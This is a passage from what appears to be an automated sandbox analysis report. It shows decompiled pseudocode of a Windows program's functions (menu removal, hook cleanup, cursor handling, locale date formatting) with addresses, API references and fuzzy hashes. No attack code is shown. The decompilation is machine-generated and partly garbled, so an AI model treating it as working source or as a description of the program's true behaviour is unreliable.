				if( *((char*)(_t15 + 0x229)) != 0) {
					_t15 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t15 + 0x228) & 0x00000001) != 0) {
						_t15 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t15 + 0x22f)) != 1) {
							_t26 = GetSystemMenu(E0044D590( *((intOrPtr*)(_a4 - 4))), 0);
							DeleteMenu(_t26, 0xf130, 0);
							DeleteMenu(_t26, 0xf030, 0);
							DeleteMenu(_t26, 0xf020, 0);
							return DeleteMenu(_t26, 0xf120, 0);
						}
					}
				}
				return _t15;
			}

0x004693cb
0x004693d5
0x004693da
0x004693e4
0x004693e9
0x004693f3
0x00469408
0x00469412
0x0046941f
0x0046942c
0x00000000
0x00469439
0x004693f3
0x004693e4
0x00469440

APIs

GetSystemMenu.USER32 ref: 00469403
DeleteMenu.USER32 ref: 00469412
DeleteMenu.USER32 ref: 0046941F
DeleteMenu.USER32 ref: 0046942C
DeleteMenu.USER32 ref: 00469439

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$System
String ID:
API String ID: 2163645685-0
Opcode ID: 66ddc8633ab7fa1662fcdf0a0808a99ae8ec368a2b1b644ab620be2e1ddcfa31
Instruction ID: 4daed32dc3906b343c58a9c78c211f2504db0f59832efa77781c2d32f4c19415
Opcode Fuzzy Hash: 66ddc8633ab7fa1662fcdf0a0808a99ae8ec368a2b1b644ab620be2e1ddcfa31
Instruction Fuzzy Hash: C6011D707893447BE3209669DC8EF6A7BD85B08718F4450A5B6046F6D3C6BCFD81861D

Uniqueness

Uniqueness Score: -1.00%

Function 00465CAC, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00465CAC() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x4bcb94 != 0) {
					_t10 =  *0x4bcb94; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x4bcb94 = 0;
				if( *0x4bcb98 != 0) {
					_t2 =  *0x4bcb90; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x4bcb8c) {
						_t8 =  *0x4bcb98; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x4bcb98; // 0x0
					CloseHandle(_t5);
					 *0x4bcb98 = 0;
					return 0;
				}
				return 0;
			}

0x00465cb3
0x00465cb5
0x00465cbb
0x00465cbb
0x00465cc2
0x00465cce
0x00465cd0
0x00465cd6
0x00465ce6
0x00465cea
0x00465cf0
0x00465cf0
0x00465cf5
0x00465cfb
0x00465d02
0x00000000
0x00465d02
0x00465d07

APIs

UnhookWindowsHookEx.USER32 ref: 00465CBB
SetEvent.KERNEL32(00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CD6
GetCurrentThreadId.KERNEL32(00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CDB
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046816E,00000000,00467143,?,?,0049FF87,00000001,00467203,?,?,?,0049FF87), ref: 00465CF0
CloseHandle.KERNEL32(00000000), ref: 00465CFB

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 83a0248c692caf1bfa133791a9b1ba765b7e667e2311d2e077363c631f508b8e
Instruction ID: c81f42254c50c6f3cca4bc091049c911655a8f45ab821131f47ff2abb7b823e7
Opcode Fuzzy Hash: 83a0248c692caf1bfa133791a9b1ba765b7e667e2311d2e077363c631f508b8e
Instruction Fuzzy Hash: DAF0ACB15182009BD754EBB9FCCBA0E36A4A714314F104A3AB509D72E2D6B9B450CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00451A40, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00451A40(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_push(__edi);
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x451e18);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E004504AC(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E0044557C();
									E00447A88( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x451e1f);
						return E004043D8( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E004466E4(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E00446D44(_t300,  &_v76);
								E0040442C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E004043D8( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E00451928(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E00451474(_v8, __eflags);
					} else {
						E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x45ccbc; // 0x45cd08
								_t186 = E004037A4( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E00446C64(_t295, 0);
								} else {
									E00463C6C(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E00446888( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0044D590( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0044C0C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x4bb224; // 0x4bcb80
					SetCursor(E004653CC( *_t209,  &_v20,  *((short*)(0x4a0e0c + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00451528(_v8);
						E00407588( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004519B0(_t306);
						E00451528(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407588( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E004504AC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0044D590( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x442c24; // 0x442c70
							_t236 = E004037A4( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E00447424(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00451414(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}

0x00451a40
0x00451a41
0x00451a48
0x00451a4b
0x00451a4e
0x00451a50
0x00451a55
0x00451a56
0x00451a5b
0x00451a5e
0x00451a61
0x00451a63
0x00451a68
0x00451a8c
0x00451a8c
0x00451a91
0x00451b12
0x00451b25
0x00451b27
0x00451b29
0x00451b2f
0x00451b33
0x00451b39
0x00451b3d
0x00451b43
0x00451b51
0x00451b51
0x00451b3d
0x00451b33
0x00451ded
0x00451df5
0x00451dff
0x00451dff
0x00451e02
0x00451e04
0x00451e07
0x00451e0a
0x00451e17
0x00451e17
0x00451a93
0x00451a93
0x00451a98
0x00451d2b
0x00451d2e
0x00451d32
0x00000000
0x00000000
0x00451d49
0x00451d4b
0x00451d4f
0x00451d61
0x00451d63
0x00000000
0x00000000
0x00451d6c
0x00451d6c
0x00451d6f
0x00451d7a
0x00451d7f
0x00451d8e
0x00451d98
0x00451da3
0x00451db3
0x00451dc3
0x00451dcb
0x00451dd9
0x00451de7
0x00451de8
0x00451de9
0x00451dea
0x00000000
0x00451dea
0x00451d71
0x00451d74
0x00000000
0x00000000
0x00000000
0x00451d74
0x00451d57
0x00000000
0x00451a9e
0x00451a9e
0x00451aa1
0x00451aa7
0x00451aaa
0x00451ab0
0x00451abf
0x00451abf
0x00451ab0
0x00000000
0x00451aa1
0x00451a98
0x00451a6a
0x00451c0e
0x00451c12
0x00451c72
0x00451c14
0x00451c1a
0x00451c2d
0x00451c2f
0x00451c31
0x00451c37
0x00451c3b
0x00451c41
0x00451c46
0x00451c4c
0x00451c51
0x00451c53
0x00451c65
0x00451c55
0x00451c57
0x00451c57
0x00451c53
0x00451c3b
0x00451c31
0x00000000
0x00451c12
0x00451a70
0x00451a73
0x00451c80
0x00451c91
0x00451c99
0x00451c9f
0x00451ca2
0x00451ca7
0x00000000
0x00000000
0x00451cb8
0x00451cbb
0x00000000
0x00000000
0x00451ccc
0x00451cce
0x00000000
0x00000000
0x00451ce2
0x00451ce4
0x00451ce6
0x00000000
0x00000000
0x00451cec
0x00451cf0
0x00000000
0x00000000
0x00451d05
0x00451d12
0x00451d17
0x00000000
0x00451d17
0x00451a79
0x00451a7e
0x00451ac9
0x00451acc
0x00451ad0
0x00451ad9
0x00451ae4
0x00451ae9
0x00451aef
0x00451af5
0x00451af9
0x00451b02
0x00451b02
0x00000000
0x00451ad0
0x00451a81
0x00451b61
0x00451b66
0x00451b74
0x00451b76
0x00451b78
0x00000000
0x00000000
0x00451b7e
0x00451b82
0x00451b96
0x00451b9a
0x00000000
0x00000000
0x00451bbc
0x00451bc1
0x00451bc3
0x00451bc8
0x00451bce
0x00451bd3
0x00451bd5
0x00451bdc
0x00451bdc
0x00451bd5
0x00451be2
0x00451be5
0x00451bec
0x00451bf2
0x00451bf6
0x00451c01
0x00451c01
0x00451bf6
0x00000000
0x00451bec
0x00451b8c
0x00000000
0x00451a87

APIs

GetCursorPos.USER32(?), ref: 00451C80
SetCursor.USER32(00000000), ref: 00451D12

Strings

p,D, xrefs: 00451BC8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor
String ID: p,D
API String ID: 3268636600-3811598181
Opcode ID: 2297ab0d909b4ebfa25472f2a852e7a46c68a4d31326d1a15cbb0e8506c405c4
Instruction ID: 33656bb65c2a08785ce95e77fa4c7609075383fb1fb86a0300e106f03f61fb9e
Opcode Fuzzy Hash: 2297ab0d909b4ebfa25472f2a852e7a46c68a4d31326d1a15cbb0e8506c405c4
Instruction Fuzzy Hash: 54C13F34A00609CFCB10DFA9C985A9EB7F1BF44306B144566EC11AB366DB78FE49CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00454A24, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00454A24(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				char _v28;
				intOrPtr _t60;
				void* _t102;
				intOrPtr _t106;
				void* _t112;
				intOrPtr _t126;
				intOrPtr _t141;
				void* _t148;
				void* _t149;
				intOrPtr _t150;

				_t148 = _t149;
				_t150 = _t149 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_v28 = 0;
				_v24 = 0;
				_t112 = __edx;
				_v8 = __eax;
				_push(_t148);
				_push(0x454c3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t150;
				if(E00454508(_v8) == 0) {
					L6:
					E00403814(_v8, __eflags);
					__eflags = 0;
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x454c42);
					return E004043FC( &_v28, 2);
				} else {
					E004552C0(_v8, __edx, __ecx, __ecx, __ecx);
					_t116 = _a4;
					_v12 = E004548E4(_v8, __edx, _a4, __ecx, __ecx);
					if(_v12 == 0xffffffff) {
						_t60 =  *0x4bad88; // 0x4263e4
						E0040656C(_t60, _t116,  &_v28);
						E0040CAC4(_v28, 1);
						E00403DEC();
						goto L6;
					} else {
						 *[fs:eax] = _t150;
						_v16 = E0042D2EC(1);
						 *[fs:eax] = _t150;
						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x454bcc, _t148,  *[fs:eax], 0x454bec, _t148);
						 *((intOrPtr*)( *_v16 + 0x40))();
						_v20 = E0042D2EC(1);
						 *[fs:eax] = _t150;
						E0042E778(_v20, 1);
						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x454baf, _t148);
						_t121 =  *_v20;
						 *((intOrPtr*)( *_v20 + 0x40))();
						L0042FD00();
						L0042FD00();
						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004546DC(_v8), _v12, E004294DC(E0042D8BC(_v20)), 0, 0, 0x10, E004546DC(_v8), _v12, E004294DC(E0042D8BC(_v16)), 0, 0, 0)));
						_push(_t112);
						_t102 = E004546DC(_v8);
						_push(_t102);
						L0042FD08();
						if(_t102 == 0) {
							_t106 =  *0x4bad88; // 0x4263e4
							E0040656C(_t106, _t121,  &_v24);
							E0040CAC4(_v24, 1);
							E00403DEC();
						}
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(0x454bb6);
						return E0040360C(_v20);
					}
				}
			}

0x00454a25
0x00454a27
0x00454a2a
0x00454a2b
0x00454a2e
0x00454a31
0x00454a36
0x00454a38
0x00454a3d
0x00454a3e
0x00454a43
0x00454a46
0x00454a53
0x00454c14
0x00454c1b
0x00454c20
0x00454c22
0x00454c25
0x00454c28
0x00454c3a
0x00454a59
0x00454a5e
0x00454a63
0x00454a70
0x00454a77
0x00454bf6
0x00454bfb
0x00454c0a
0x00454c0f
0x00000000
0x00454a7d
0x00454a88
0x00454a97
0x00454aa5
0x00454ab3
0x00454ac1
0x00454ad0
0x00454ade
0x00454ae6
0x00454af6
0x00454b02
0x00454b04
0x00454b28
0x00454b4e
0x00454b64
0x00454b65
0x00454b69
0x00454b6e
0x00454b6f
0x00454b76
0x00454b7b
0x00454b80
0x00454b8f
0x00454b94
0x00454b94
0x00454b9b
0x00454b9e
0x00454ba1
0x00454bae
0x00454bae
0x00454a77

APIs

Part of subcall function 004548E4: 73F66EA0.COMCTL32(?,00000000,00000000,?,00000000,004549E3), ref: 00454987

73F15F62.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00454BEC,?,00000000,00454C3B), ref: 00454B28
73F15F62.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00454BEC), ref: 00454B4E
73F0DDC8.COMCTL32(00000000,?,00000000,?,?,00000000,00454BEC,?,00000000,00454C3B), ref: 00454B6F

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

Strings

cB, xrefs: 00454B7B, 00454BF6

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID: cB
API String ID: 2948472770-842239044
Opcode ID: 4b55c0dcf82b0adbfcb383607b032d4bcb68e8b8b73c8f9b57aafcef0519f09b
Instruction ID: e88ac99f0eed30d456877d236d4d135c0a6cb2cd92f3bab271b01f80d21897e8
Opcode Fuzzy Hash: 4b55c0dcf82b0adbfcb383607b032d4bcb68e8b8b73c8f9b57aafcef0519f09b
Instruction Fuzzy Hash: 81514274B10204EFC700EFA9D892E5EBBB9FF49709F5144A9F800AB792C635AD05DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C60C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040C60C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40c7d6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004043D8(__edx);
				E0040C2D4(GetThreadLocale(), 0x40c7ec, 0x1009,  &_v12);
				if(E00408EF0(0x40c7ec, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404698(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x4a010c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004095BC(_t124 + _t92 - 1, 2, 0x40c7f0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004095BC(_t124 + _t92 - 1, 4, 0x40c800);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004095BC(_t124 + _t92 - 1, 2, 0x40c818);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004046A0(_t122, 0x40c830);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E004045C0();
												E004046A0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004046A0(_t122, 0x40c824);
										_t92 = _t92 + 1;
									}
								} else {
									E004046A0(_t122, 0x40c810);
									_t92 = _t92 + 3;
								}
							} else {
								E004046A0(_t122, 0x40c7fc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040D718(_t124, _t92);
							E004048F8(_t124, _v8, _t92,  &_v20);
							E004046A0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4bc748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E0040442C(_t122, _t124);
					} else {
						while(_t92 <= E00404698(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E004045C0();
									E004046A0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040C7DD);
				return E004043FC( &_v24, 4);
			}

0x0040c60c
0x0040c611
0x0040c612
0x0040c613
0x0040c614
0x0040c615
0x0040c619
0x0040c61b
0x0040c61f
0x0040c620
0x0040c625
0x0040c628
0x0040c62b
0x0040c632
0x0040c64a
0x0040c662
0x0040c7ac
0x0040c7ae
0x0040c7b3
0x0040c7b5
0x00000000
0x00000000
0x0040c6cb
0x0040c6d0
0x0040c6d7
0x0040c715
0x0040c71a
0x0040c71c
0x0040c73b
0x0040c740
0x0040c742
0x0040c763
0x0040c768
0x0040c76a
0x0040c77f
0x0040c77f
0x0040c781
0x0040c787
0x0040c78e
0x0040c783
0x0040c783
0x0040c785
0x0040c79c
0x0040c7a6
0x00000000
0x00000000
0x00000000
0x0040c785
0x0040c76c
0x0040c773
0x0040c778
0x0040c778
0x0040c744
0x0040c74b
0x0040c750
0x0040c750
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c7ab
0x0040c7ab
0x0040c6d9
0x0040c6e2
0x0040c6f0
0x0040c6fa
0x0040c6ff
0x0040c6ff
0x0040c6d7
0x0040c668
0x0040c668
0x0040c66d
0x0040c670
0x0040c67e
0x0040c67a
0x0040c67a
0x0040c67a
0x0040c682
0x0040c6bd
0x0040c684
0x0040c6a9
0x0040c68a
0x0040c68a
0x0040c68c
0x0040c68e
0x0040c690
0x0040c699
0x0040c6a3
0x0040c6a3
0x0040c690
0x0040c6a8
0x0040c6a8
0x0040c6a8
0x0040c6b4
0x0040c682
0x0040c7bb
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c7d5

APIs

GetThreadLocale.KERNEL32(?,00000000,0040C7D6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C63B

Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2

Strings

eeee, xrefs: 0040C746
yyyy, xrefs: 0040C72D
ggg, xrefs: 0040C720

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 536e37d3c0041148d42fa77e41a5475a8424998882fb45136ddedfdbb558155f
Instruction ID: 5e2cfa4f1505c3fc26b2c05eee7d4dae8800807708694686a8841c935d880d75
Opcode Fuzzy Hash: 536e37d3c0041148d42fa77e41a5475a8424998882fb45136ddedfdbb558155f
Instruction Fuzzy Hash: F341E879710506CBC711ABA988C16BEB296DBC5304B604B3BE541F33C6E73D9D029A2D

Uniqueness

Uniqueness Score: -1.00%

Function 0046FF40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0046FF40(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				char _t86;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t101;
				void* _t107;
				intOrPtr _t109;
				void* _t112;

				_t86 = 0;
				_v28 = 0;
				_t109 = __edx;
				_t85 = __eax;
				_push(_t112);
				_push(0x47011e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t112 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t109 != 0 &&  *((intOrPtr*)(_t109 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t91 =  *0x46d120; // 0x46d16c
							if(E004037A4(_t109, _t91) == 0) {
								_t92 =  *0x4a00a0; // 0x0
								if(E004037A4(_t109, _t92) == 0) {
									_t93 =  *0x4a00a0; // 0x0
